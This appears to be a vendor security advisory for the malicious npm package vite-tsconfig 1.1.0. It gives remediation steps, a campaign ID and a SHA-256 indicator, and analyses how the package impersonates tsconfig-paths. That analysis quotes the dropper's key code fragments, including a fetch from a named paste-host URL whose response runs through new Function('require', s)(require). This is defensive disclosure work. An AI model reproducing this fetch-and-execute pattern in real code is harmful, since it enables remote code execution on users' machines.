Which versions of vite-tsconfig are malicious?

The following npm versions of vite-tsconfig are flagged malicious: 1.1.0. Treat any of these as compromised.

How do I remediate vite-tsconfig if I installed it?

Remove vite-tsconfig from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Is vite-tsconfig part of a known attack campaign?

Yes — vite-tsconfig is associated with the IN-MAL-2026-005599 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

Can O3 Security detect vite-tsconfig in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking vite-tsconfig and packages like it before any post-install script runs.

Malicious package

vite-tsconfignpm

Malicious code in vite-tsconfig (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-5576

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall vite-tsconfig

What this malware does

The package is named vite-tsconfig and replicates the public API of the legitimate tsconfig-paths library (register, loadConfig, createMatchPath, matchFromAbsolutePaths), but adds an extra exported function configJson that is not present upstream. When a consumer calls configJson(), lib/config-loader.js spawns a detached, stdio-suppressed node lib/mapProps.js child process (child_process.spawn with detached:true and child.unref()). lib/mapProps.js then issues axios.get('https://www.jsonkeeper.com/b/5IZTJ') with header x-secret-key: _, takes response.data.Cookie, and executes it as JavaScript with full Node capability via new Function('require', s)(require) — retried up to 5 times. jsonkeeper.com is an anonymous public JSON paste host, so the executed payload is mutable and attacker-controlled, giving the publisher arbitrary remote code execution on any machine where a consumer invokes the documented configJson API. The remote URL is camouflaged as DEV_API_KEY inside a fake process.env shadow object, and the loader is wrapped in pino-logger-shaped config (messageKey/levels in lib/config-loader.js) to disguise the dropper. README references vite-json and dividab/tsconfig-paths, confirming the impersonation framing.

Malicious versions

1 flagged

1.1.0

Indicators of compromise (SHA-256)

142b4a600291ebf355bb7915c082c34b329e58026dc3c1f181a5b1865c16cff9

Frequently asked questions

No. vite-tsconfig on npm has been identified as a malicious package (version 1.1.0 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-005599

References

npmjs.com

Credits

Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection